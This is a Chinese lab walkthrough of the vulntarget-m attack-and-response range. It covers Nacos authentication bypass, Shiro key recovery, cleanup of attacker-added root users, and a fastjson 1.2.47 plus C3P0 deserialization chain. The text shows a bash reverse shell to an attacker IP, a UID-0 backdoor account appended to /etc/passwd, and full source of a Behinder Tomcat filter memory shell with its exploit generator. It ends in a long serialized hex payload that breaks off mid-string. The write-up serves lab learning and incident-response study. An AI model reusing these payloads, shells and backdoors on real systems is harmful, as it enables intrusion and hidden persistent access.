vulntarget-m-攻防应急靶场
环境搭建
下载地址:https://github.com/crow821/vulntarget
下载后解压压缩包直接用vmware打开即可
网络配置
两个网卡一个nat 一个仅主机
因为他的内网ip不能变更
所以我先添加一个自定义的vm6
01机子
02机子
03机子
三台机子的默认账号密码均为vulntarget
入口机为双网卡,外网我设置的的是nat模式,内网ip固定为192.168.137.20
内网机02为仅主机模式,ip固定为192.168.137.10
内网机03为仅主机模式,ip固定为192.168.137.30
拓扑图
注意点
本次靶场设定内网渗透和应急响应,应急部分设计到了内存马,复现时不能重启机子
重启会导致内存马失效。
背景设定
某公司将自己公司的业务搬到了云上,并存在内网服务,公司运维人员主要通过远程ssh
登录入口机,对服务进行日常维护和管理。
在前段时间,某国外黑客发现该公司的入口机存在漏洞,并入侵了该机器,同时可能入侵了内网系统。
运维在今日登录维护的时候,发现ssh
无法登录,经过排查发现ssh
密码目前已经被修改。
由于环境特殊,暂时无法通过其他的方法对机器进行重置密码,且由于业务的重要性,不能够对服务器进行重启等。
根据以上条件:
请利用先攻再应急的特殊思维方法来进行应急。
任务目标
对3
台机器进行应急排查,对其中可能的后门进行排查
不能够重启机器(重启则判定应急失败)
在你认为应急成功之后,请获取对应的flag
,并对你获取的flag
进行check
在三台靶机中,账号密码均为vulntarget
。在tmp
目录下,均存在check_flag
和get_flag
文件:
其中get_flag
为获取flag
的文件,如果您感觉应急成功的话,会获得flag
:
check_flag
为校验flag
的文件,如果您获取flag
之后,可以校验下当前flag
是否有效:
然后要是应急失败可以快照回去
每台机子都已经预设好了快照
复现
arp-scan -l
先找外网机子的IP
192.168.131.136
然后就是正常的打靶思路做下去
信息收集
端口扫描
nmap -p- -sV -sC -A 192.168.131.136
有22 ssh,80 http,7848 tcp ,8848 http,9848 9849 tcp
漏洞探测
先访问80端口
可以看到一个登录口
遇到登录口一般尝试万能密码等一些注入,或者找出他是否时某种开源的cms,我在源码中没看到明显框架的提示,尝试抓包注入吧
这里在响应包中发现了rememberme=deleteme
是明显的shiro服务特征
尝试爆破密钥
失败 没密钥那就先放放看看别的端口
还有一个8848 也是http
访问一下
notfound
那就扫一下目录
python3 dirsearch.py -u http://192.168.131.136:8848/ -e*
发现nacos服务
那工具扫了一下
存在Nacos User-Agent权限绕过(CVE-2021-29441)
{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$xF9NGkrm1zP8hUIPnmErNej.jf7biH.MleVXtgx9v6W8tKAUkZuDK"}]}
这个可以直接绕过登录
我这里直接用工具,主打一个便捷
然后利用添加的用户登录到后台
里面存在大量敏感信息
往后下翻看到了shiro的key
\
#权限认证
shiro:
enabled: true
set-login-uri: /login
key: KduO0i+zUIMcNNJnsZwU9Q==
探测到了192.168.137.10
并不是我们访问的192.168.131.136
反向代理
Nginx 反向代理后,Web 服务器显示的 IP 通常是nginx服务器的 IP 地址。
当客户端发送请求到 Nginx 反向代理服务器时,Nginx 会接收请求并根据配置将其转发到后端的 Web 服务器。在这个过程中,客户端看到的是 Nginx 服务器的 IP 地址,而不是实际 Web 服务器的 IP 地址。
漏洞利用
尝试注入内存马
多种方式都不行,大概因为反向代理吗??
代理服务器是内网ip所以不出网的意思吧
执行ping也是失败
先放着吧
前面探测可能还存在反序列化漏洞
上网搜一下版本和端口的条件都符合
用工具上传内存马验证一下
成功
冰蝎连接成功
然后就是找到getflag 验证flag
无法做到交互一直卡在执行中
flag{3b87ad49859de6e22a2e1d9ff29bdf73}
反弹shell
bash -i >& /dev/tcp/192.168.131.131/6666 0>&1
nc -lvvp 6666
执行命令会报错
直接利用冰蝎内置的反弹shell
切换pty
python3 -c "import pty;pty.spawn('/bin/bash')"
不对…
排查
不对说明没有排查透彻
那就按常规应急思路来
后门已经找到了
那看看隐藏用户,计划任务这些吧
Linux查看所有用户
cat /etc/passwd
一个高权限的用户 且uid 和gid都是0和root 一样 那大概率是攻击者创建的的用户
userdel 命令删不行 有进程占用
直接用vim直接编辑删除
反弹shell会错 在冰蝎上盖
命令改不好弄很卡而且键盘乱的
直接这里改删掉最后一行
flag{6c3742aaf26a6dea7fe9d7731de59517}
01机子应急成功
这里因为反向代理,我们获取的ip是内网02机子的
所以相当于我们已经得到了内网02 机子的root权限
内网02
我们可以直接在/etc/passwd中添加新用户然后通过22端口的ssh连接它
添加新的用户信息格式
新用户名:x:新用户ID:新组ID:用户注释:新用户主目录:登录 shell
密码字段则会用“x”代替(实际密码会保存在/etc/shadow文件中)
loki:x:0:0:root:/root:/bin/bash
这里遇到一个问题密码怎么搞有点不会
我试试改当前账户root密码后续通过ssh连接
第二天做的时候断开了连接
重新反弹shell
我这里01机子内网ip是192.168.37.128--------------(这里傻逼了一开始没发现ip设置错了)
这里可以看到root的密码已经被我改了
显示了其加密后的 而不是之前的*
通过ssh连接上
shadow中密码的加密方式就是md5加密
知道这个我们就可以添加用户了
但是这个加密又有点复杂
可以参考这文章:
Hashcat破解/etc/shadow_hashcat+shadow-CSDN博客
密码破解全能工具:Hashcat密码破解攻略_hashcat password.dict-CSDN博客
我这里就直接用别人的方法了,加解密搞得时间有点久还没弄出来
隔了一天做,shiro那个登录口也奔溃了
利用不了shiro直接在内网02写入新用户了
echo "fwl:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash" >> /etc/passwd
账号fwl 密码admin23
可以新建一个脚本sh文件然后通过01机下载过来执行
wget http://192.168.137.128:8000/1
chmod 777 1
一直连不上 后来重新回顾才发现 我tm ip配置错了
难怪有个192.168.37.128 .。
重新搞了一下哎,心累
妈的重置了01 又要重新打一遍,,,
这里可以看到shiro服务相当于是内网02机子开的的
也就是说目前的环境是在内网机子里
所以利用这点在这里写入新用户
echo "fwl:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash" >> /etc/passwd
账号fwl 密码admin23
直接写入不行,那就写到脚本文件里然在这里wget下载,然后执行脚本,使它写入
利用python开一个http服务
wget http://192.168.137.20:8000/1.sh
但是我在执行这个命令时一直是没反应的
后来我就cat /etc/passwd
发现一开始echo已经直接写入了新用户…
ssh去连接
发现不行
权限不够,需要开启允许root登录
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
重启
/etc/init.d/ssh restart
写入后重启ssh
连接成功
排查
我先获取flag 有个error说明还没应急成功
和01机子一样先看看有没有可疑的用户
cat /etc/passwd
guest 0:0 很明显可疑用户 权限太高了 删除它
vim /etc/passwd 直接删除那一行即可
还没完成
检查一下异常端口,进程
netstat -antlp|more
ps -aux 查看进程
检查有无计划任务
crontab -l
结合上面可以看到一个jar文件
app.jar
01机下载app.jar
然后通过冰蝎拿出原来分析
我在用反编译工具是总会报错
上网搜了是jar包损坏了…
那这里就跳过吧,正常流程就是反编译后找到他写的恶意代码,代码审计这个意思
我水平有限估计也有点难审,先跳过,因为知道这是恶意文件了直接下一步
搭建代理隧道
我这里用nps来搞
切换到windterm
方便传文件
上传nps客户端和服务端到01机子
我这里详细讲一下搭建过程,有时自己也会忘 linux下
上传后给nps权限 chmod 777 nps
然后 ./nps install
安装完成
看下配置文件 我这里跳过
nps start 启动nps
01上没弄好我把服务端放到了自己的服务器上
然打开客户端
在客户端上输入上面的命令
连接成功
上线
再打开proxifier设置代理
设置好规则
此时我们可以直接走隧道访问内网
然后ssh连接到内网02机子
然后直接fscan扫一下内网------------这一步我做的应该有问题好像不是这么用的,我是直接挂了代理后直接本机上扫,也不是上传到受害机上扫的
在源码中发现登录 上传页面
一般拿到登录口可以先尝试弱口令 万能密码 ,注入,试了一下都不行
那就要探测他的版本,用的什么开源cms 之类的,
这里我自己不会探测了,参考官方wp
删除右侧"}"
探测具体版本
且他的代码对字段 @type、ldap、rmi,TemplatesImpl等 进行过滤
在源码中,Fastjson在解析时会自动解码unicode和hex编码字符,
{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.AutoCloseable"
探测到版本为fastjson1.2.47
版本很低
利用的方式为JNDI
非严格意义上的出网,比如这里我们控制了外网主机,可以使用外网主机作为server端能提供 ldap或rmi
参考文章:vulntarget-m(星期五实验室)-CSDN博客
{
"x": {
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
"val": "org.springframework.web.bind.annotation.RequestMapping"
}
}
{
"x": {
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
"val": "com.mchange.v2.c3p0.DataSources"
}
}
通过这种方法结合已知的FastJson利用链所需要的依赖类,最终探测服务中存在C3P0依赖
fastjson漏洞利用
接下来的操作都是网上的大佬做的, 搬运学习
FastJson本身结合C3P0有很多利用方式,其中提的最多的是不出网利用,hex base二次反序列化打内存马。
c3p0+FastJson利用
因为FastJson全版本都存在原生反序列化漏洞,且是通过TemplatesImpl加载类
所以不需要依赖像cc链这样的反序列化链
找一个冰蝎内存马:Tomcat的Filter型内存马,但因为是TemplatesImpl这条链加载字节码,所以需要extends AbstractTranslet并重写两个方法,否则加载不了这个类。 编译为IceShell.class
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.DispatcherType;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import sun.misc.BASE64Decoder;
public class IceShell extends AbstractTranslet implements Filter {
private final String pa = "3ad2fddfe8bad8e6";
public IceShell() {
}
public void init(FilterConfig filterConfig) throws ServletException {
}
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
HttpServletRequest request = (HttpServletRequest)servletRequest;
HttpServletResponse response = (HttpServletResponse)servletResponse;
HttpSession session = request.getSession();
Map<String, Object> pageContext = new HashMap();
pageContext.put("session", session);
pageContext.put("request", request);
pageContext.put("response", response);
ClassLoader cl = Thread.currentThread().getContextClassLoader();
if (request.getMethod().equals("POST")) {
Class Lclass;
if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
} else {
Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
this.RushThere(Lclass, cl, session, request, pageContext);
}
filterChain.doFilter(servletRequest, servletResponse);
}
}
public void destroy() {
}
public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map<String, Object> pageContext) {
byte[] bytecode = Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
try {
Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
define.setAccessible(true);
Class uclass = null;
try {
uclass = cl.loadClass("U");
} catch (ClassNotFoundException var18) {
uclass = (Class)define.invoke(cl, bytecode, 0, bytecode.length);
}
Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
constructor.setAccessible(true);
Object u = constructor.newInstance(this.getClass().getClassLoader());
Method Um = uclass.getDeclaredMethod("g", byte[].class);
Um.setAccessible(true);
String k = "3ad2fddfe8bad8e6";
session.setAttribute("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
byte[] eClassBytes = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine()));
Class eclass = (Class)Um.invoke(u, eClassBytes);
Object a = eclass.newInstance();
Method b = eclass.getDeclaredMethod("equals", Object.class);
b.setAccessible(true);
b.invoke(a, pageContext);
} catch (Exception var19) {
}
}
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
static {
try {
String name = "AutomneGreet";
WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();
StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();
Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
Configs.setAccessible(true);
Map filterConfigs = (Map)Configs.get(standardContext);
if (filterConfigs.get("AutomneGreet") == null) {
Filter filter = new IceShell();
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filter);
filterDef.setFilterName("AutomneGreet");
filterDef.setFilterClass(filter.getClass().getName());
standardContext.addFilterDef(filterDef);
FilterMap filterMap = new FilterMap();
filterMap.addURLPattern("/shell");
filterMap.setFilterName("AutomneGreet");
filterMap.setDispatcher(DispatcherType.REQUEST.name());
standardContext.addFilterMapBefore(filterMap);
Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
constructor.setAccessible(true);
ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)constructor.newInstance(standardContext, filterDef);
filterConfigs.put("AutomneGreet", filterConfig);
}
} catch (Exception var10) {
}
}
}
内存马做好后结合c3p0链生成json,最终exp如下
import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
public class Test {
public static void main(String[] args) throws Exception {
String hex2 = bytesToHex(tobyteArray(gen()));
String FJ1247 = "{\n" +
" \"a\":{\n" +
" \"@type\":\"java.lang.Class\",\n" +
" \"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +
" },\n" +
" \"b\":{\n" +
" \"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +
" \"userOverridesAsString\":\"HexAsciiSerializedMap:" + hex2 + ";\",\n" +
" }\n" +
"}\n";
System.out.println(FJ1247);
}
//FastJson原生反序列化加载恶意类字节码
public static Object gen() throws Exception {
TemplatesImpl templates = TemplatesImpl.class.newInstance();
byte[] bytes = Files.readAllBytes(Paths.get("e:\\IceShell.class")); //做好的冰蝎马地址,读取其中字节即可
setValue(templates, "_bytecodes", new byte[][]{bytes});
setValue(templates, "_name", "1");
setValue(templates, "_tfactory", null);
JSONArray jsonArray = new JSONArray();
jsonArray.add(templates);
BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
setValue(bd,"val",jsonArray);
HashMap hashMap = new HashMap();
hashMap.put(templates,bd);
return hashMap;
}
public static void setValue(Object obj, String name, Object value) throws Exception{
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
field.set(obj, value);
}
//将类序列化为字节数组
public static byte[] tobyteArray(Object o) throws IOException {
ByteArrayOutputStream bao = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bao);
oos.writeObject(o); //
return bao.toByteArray();
}
//字节数组转十六进制
public static String bytesToHex(byte[] bytes) {
StringBuffer stringBuffer = new StringBuffer();
for (int i = 0; i < bytes.length; i++) {
String hex = Integer.toHexString(bytes[i] & 0xff); //bytes[]中为带符号字节-255~+255,&0xff: 保证得到的数据在0~255之间
if (hex.length()<2){
stringBuffer.append("0" + hex); //0-9 则在前面加‘0’,保证2位避免后面读取错误
}else {
stringBuffer.append(hex);
}
}
return stringBuffer.toString();
}
}
运行exp即可生成一段json数据:
{
"a":{
"\u0040\u0074\u0079\u0070\u0065":"java.lang.Class",
"val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
},
"b":{
"\u0040\u0074\u0079\u0070\u0065":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e002000078700000254acafebabe0000003401880a005e00cc0800cd09004b00ce0700cf0700d00b000400d10700d20a000700cc08007f0b004900d308007b08007d0a00d400d50a00d400d60b000400d70800d80a00d900da0a002400db0a001c00dc0a001c00dd0800de0a004b00df0b00e000e10a00e200e30800e40a00e500e60800e70700e80700a40900e900ea0a001c00eb0a00ec00ed0800ee0a002700ef0700f00700f10a00e900f20a00ec00f30700f40a001c00f50a00f600ed0a001c00f70a00f600f80800f908009d0b00fa00fb0800fc0a00fd00fe0700ff0a00d901000a003101010a00fd01020701030a003500cc0b000401040a010501060a003501070a00fd01080a001c010908010a07010b08010c07010d0a003f010e0b010f01100701110801120a001c01130800c90a001c01140a011500ed0a011501160701170b004901160701180a004b00cc0701190a004d00cc0a004d011a0a004d011b0a004d011c0a0042011d07011e0a005300cc08011f0a005301200a0053011b09012101220a012101230a005301240a0042012507012607012707012807012901000270610100124c6a6176612f6c616e672f537472696e673b01000d436f6e7374616e7456616c75650100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000a4c4963655368656c6c3b010004696e697401001f284c6a617661782f736572766c65742f46696c746572436f6e6669673b295601000c66696c746572436f6e66696701001c4c6a617661782f736572766c65742f46696c746572436f6e6669673b01000a457863657074696f6e7307012a0100104d6574686f64506172616d6574657273010008646f46696c74657201005b284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b4c6a617661782f736572766c65742f46696c746572436861696e3b29560100064c636c6173730100114c6a6176612f6c616e672f436c6173733b01000e736572766c65745265717565737401001e4c6a617661782f736572766c65742f536572766c6574526571756573743b01000f736572766c6574526573706f6e736501001f4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b01000b66696c746572436861696e01001b4c6a617661782f736572766c65742f46696c746572436861696e3b010007726571756573740100274c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b010008726573706f6e73650100284c6a617661782f736572766c65742f687474702f48747470536572766c6574526573706f6e73653b01000773657373696f6e0100204c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b01000b70616765436f6e7465787401000f4c6a6176612f7574696c2f4d61703b010002636c0100174c6a6176612f6c616e672f436c6173734c6f616465723b0100164c6f63616c5661726961626c65547970655461626c650100354c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b01000d537461636b4d61705461626c6507011807012b07012c07012d0700cf0700d007012e0701170700f40700e807012f01000764657374726f79010009527573685468657265010081284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a6176612f7574696c2f4d61703b295601000576617231380100224c6a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e3b010006646566696e6501001a4c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000675636c61737301000b636f6e7374727563746f7201001f4c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b010001750100124c6a6176612f6c616e672f4f626a6563743b010002556d0100016b010001630100154c6a617661782f63727970746f2f4369706865723b01000b65436c61737342797465730100025b4201000665636c617373010001610100016201000862797465636f64650701300700f007010b0100095369676e61747572650100a7284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b29560100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0701310100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e01000666696c7465720100164c6a617661782f736572766c65742f46696c7465723b01000966696c7465724465660100314c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b01000966696c7465724d61700100314c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b0100324c6f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e6669673b0100046e616d65010015776562617070436c6173734c6f61646572426173650100324c6f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173653b01000f7374616e64617264436f6e7465787401002a4c6f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578743b010007436f6e666967730100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d66696c746572436f6e6669677301000a536f7572636546696c6501000d4963655368656c6c2e6a6176610c00630064010010336164326664646665386261643865360c006000610100256a617661782f736572766c65742f687474702f48747470536572766c6574526571756573740100266a617661782f736572766c65742f687474702f48747470536572766c6574526573706f6e73650c013201330100116a6176612f7574696c2f486173684d61700c013401350701360c013701380c0139013a0c013b013c010004504f535407013d0c010a013e0c013f01400c014101400c0142013c0100156a6176612e6c616e672e436c6173734c6f616465720c0094009507012d0c007101430701440c0145014801026479763636766741414144514147676f41424141554367414541425548414259484142634241415938615735706444344241426f6f54477068646d4576624746755a7939446247467a633078765957526c636a73705667454142454e765a4755424141394d6157356c546e5674596d5679564746696247554241424a4d62324e6862465a68636d6c68596d786c56474669624755424141523061476c7a415141445446553741514142597745414630787159585a684c327868626d63765132786863334e4d6232466b5a584937415141425a7745414653686251696c4d616d4632595339735957356e4c304e7359584e7a4f7745414157494241414a6251674541436c4e7664584a6a5a555a706247554241415a564c6d7068646d454d41415541426777414741415a415141425651454146577068646d4576624746755a7939446247467a633078765957526c636745414332526c5a6d6c755a554e7359584e7a415141584b46744353556b7054477068646d4576624746755a7939446247467a637a734149514144414151414141414141414941414141464141594141514148414141414f67414341414941414141474b6975334141477841414141416741494141414142674142414141414167414a4141414146674143414141414267414b4141734141414141414159414441414e414145414151414f41413841415141484141414150514145414149414141414a4b6973444b37363341414b7741414141416741494141414142674142414141414177414a4141414146674143414141414351414b414173414141414141416b4145414152414145414151415341414141416741540701490c014a014b01000b646566696e65436c61737301000f6a6176612f6c616e672f436c61737307014c0c014d00740c014e014f0701300c01500151010001550c015201530100206a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e0100106a6176612f6c616e672f4f626a6563740c015401550c015601570100156a6176612f6c616e672f436c6173734c6f616465720c0158015907015a0c015b013a0c015c015d0100016707012e0c015e015f0100034145530701600c0161016201001f6a617661782f63727970746f2f737065632f5365637265744b6579537065630c016301640c006301650c006a016601001673756e2f6d6973632f4241534536344465636f6465720c016701680701690c016a013c0c016b014b0c016c016d0c015c016e010006657175616c730100136a6176612f6c616e672f457863657074696f6e01000c4175746f6d6e6547726565740100306f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173650c016f01700701710c017201730100286f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578740100286f72672e6170616368652e636174616c696e612e636f72652e5374616e64617264436f6e746578740c017401530c017501760701770c0178017901000d6a6176612f7574696c2f4d61700100084963655368656c6c01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465660c017a017b0c017c017d0c017e017d0c017f018001002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61700100062f7368656c6c0c0181017d0701820c018301840c00c2013c0c0185017d0c018601870100306f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e66696701001b6f72672f6170616368652f636174616c696e612f436f6e74657874010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a617661782f736572766c65742f46696c74657201001e6a617661782f736572766c65742f536572766c6574457863657074696f6e01001c6a617661782f736572766c65742f536572766c65745265717565737401001d6a617661782f736572766c65742f536572766c6574526573706f6e73650100196a617661782f736572766c65742f46696c746572436861696e01001e6a617661782f736572766c65742f687474702f4874747053657373696f6e0100136a6176612f696f2f494f457863657074696f6e0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000a67657453657373696f6e01002228294c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b010003707574010038284c6a6176612f6c616e672f4f626a6563743b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010015676574436f6e74657874436c6173734c6f6164657201001928294c6a6176612f6c616e672f436c6173734c6f616465723b0100096765744d6574686f6401001428294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f537472696e67010015284c6a6176612f6c616e672f4f626a6563743b295a010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000d6765745375706572636c6173730100076765744e616d65010040284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b29560100106a6176612f7574696c2f42617365363401000a6765744465636f6465720100074465636f64657201000c496e6e6572436c617373657301001c28294c6a6176612f7574696c2f426173653634244465636f6465723b0100186a6176612f7574696c2f426173653634244465636f6465720100066465636f6465010016284c6a6176612f6c616e